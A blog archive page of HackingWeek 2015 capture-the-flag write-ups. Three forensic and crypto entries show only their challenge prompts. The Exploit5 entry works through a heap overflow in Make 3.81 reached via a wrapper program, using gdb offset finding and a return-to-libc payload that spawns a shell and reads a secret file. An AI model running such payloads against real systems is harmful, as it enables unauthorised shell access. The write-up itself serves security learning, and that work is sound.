Category Archives: 2015

English [HackingWeek 2015] [Forensic 4] Write Up

Introduction

The supplied memory image was captured on a compromised machine, analyze it to answer questions (this is the same image for the four forensic tests, useless to download several times).

When the machine was compromised, the attacker installed a Command & Control software that is currently inactive but must contact a server to receive his orders.
Find the server name and the port on which the malware should connect.
The validation key is servername:portnumber.

dump.gz (md5sum:1273931ce359f59bce95ce4507e1f4bf)

Continue reading [HackingWeek 2015] [Forensic 4] Write Up

English [HackingWeek 2015] [Forensic 3] Write Up

Introduction

The supplied memory image was captured on a compromised machine, analyze it to answer questions (this is the same image for the four forensic tests, useless to download several times).

Find the password for the admin user that is located somewhere in memory.

dump.gz (md5sum:1273931ce359f59bce95ce4507e1f4bf)

Continue reading [HackingWeek 2015] [Forensic 3] Write Up

English [HackingWeek 2015] [Crypto4] Write Up

Introduction

Session Start: Thu Feb 05 20:49:04 2015
Session Ident: #mastercsi
[20:49] * Now talking in #mastercsi
[20:49] * Topic is 'http://mastercsi.labri.fr/'
[20:49] * Set by admin!~admin on Sat Nov 22 00:06:50
[20:49] and I got an old RSA key that Alice used
[20:49] alice, alice's? you gotta be kidding me?
[20:49] haha no
[20:49] but there was just half, I had to complete with random values to make it work
[20:49] it seems to work anyway, if you have something to decipher...
[20:49] wait, I have her public key lying around somewhere, and even an encrypted file. I've always wondered what it was ...
[20:49] maybe it's the same key?
[20:50] I sent you the thing, take a look
[21:22] * Disconnected
Session Close: Thu Feb 05 21:22:11 2015

The validation key is the message encrypted with the private key of Alice, rebuild it using the following files:

alice.pub
mykey.pem (If you have some issues trying to download this file : right click -> save as …)
secret

Continue reading [HackingWeek 2015] [Crypto4] Write Up

English [HackingWeek 2015] [Exploit5] Write Up

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <string.h>

int
main(int argc, char ** argv)
{
  char * make_path = "/home/exploit05/project/make";
  char * path_prefix = "/home/exploit05/project/";

  /* Checking if there is an argument, fail if not */
  if (argc < 2)
    {
      fprintf (stderr,
         "safe-run: error: missing argument\n"
         "usage: safe-run MAKEFILE_PATH\n");
      exit(EXIT_FAILURE);
    }

  /* Check if the given path has '..' inside */
  if (strstr(argv[1], ".."))
    {
      fprintf (stderr,
         "safe-run: detected an attempt to escape the directory !\n");
      exit(EXIT_FAILURE;)
    }

  /* Concatenate path_prefix and argv[1] */
  char *makefile_path = malloc(strlen(path_prefix) + strlen(argv[1]) + 1);

  strcpy(makefile_path, path_prefix);
  strcat(makefile_path, argv[1]);

  printf("command: %s -f %s\n", make_path, makefile_path);

  /* Calling execve() */
  char * args[4] = { make_path, "-f", makefile_path, 0 };
  char * envp[1] = { 0 };

  execve(make_path, args, envp);

  /* In case the execve is failing */
  return EXIT_FAILURE;
}

Make is called in the execve() call at the end of source code.
We tried some make vulnerabilities, and found this Make 3.81 Heap Overflow.

After one try, we found out it was vulnerable :

$ gdb
(gdb) file make
(gdb) set disassembly-flavor intel
(gdb) r $(perl -e 'print "A"x4126')

(gdb) i r
eip            0x792e4141   0x792e4141              //EIP partially rewritten

We need to add 2 “A” so our buffer length + EBP + EIP registers looks like this  :

[ 4120 A ] [ 4 EBP ] [ 4 EIP] = 4128

We gather some other informations :

guest@ns314076:/home/exploit05/project$ readelf -l safe-run
Elf file type is EXEC (Executable file)
Entry point 0x8048500
There are 8 program headers, starting at offset 52

Program Headers:
Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
[...]
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4         //RW, not X

Since environment is emptied before calling make, stack is not executable and ASLR is disabled, we’ll try a return to libc exploitation. We first find system() address

(gdb) p system
$1 = {<text variable, no debug info>} 0x4006ac30 <system>

So we push system() address on the stack, preceded by a random address (return from system() ), and before that, arguments to system. Here, the only argument is a string containing ‘sh;’. We just put this string in our buffer, and after a quick dichotomous analysis, we find its address.

/home/exploit05/project/safe-run $(perl -e 'print "A"x2062 . "sh;" . "B" x2059  ."\x30\xac\x06\x40" . "AAAA" . "\xc4\xf7\xff\xbf"')

sh-4.2$ whoami
exploit05
sh-4.2$ cat /home/exploit05/.secret
EiN5ohqu5Ush-4.2$

The flag is : EiN5ohqu5U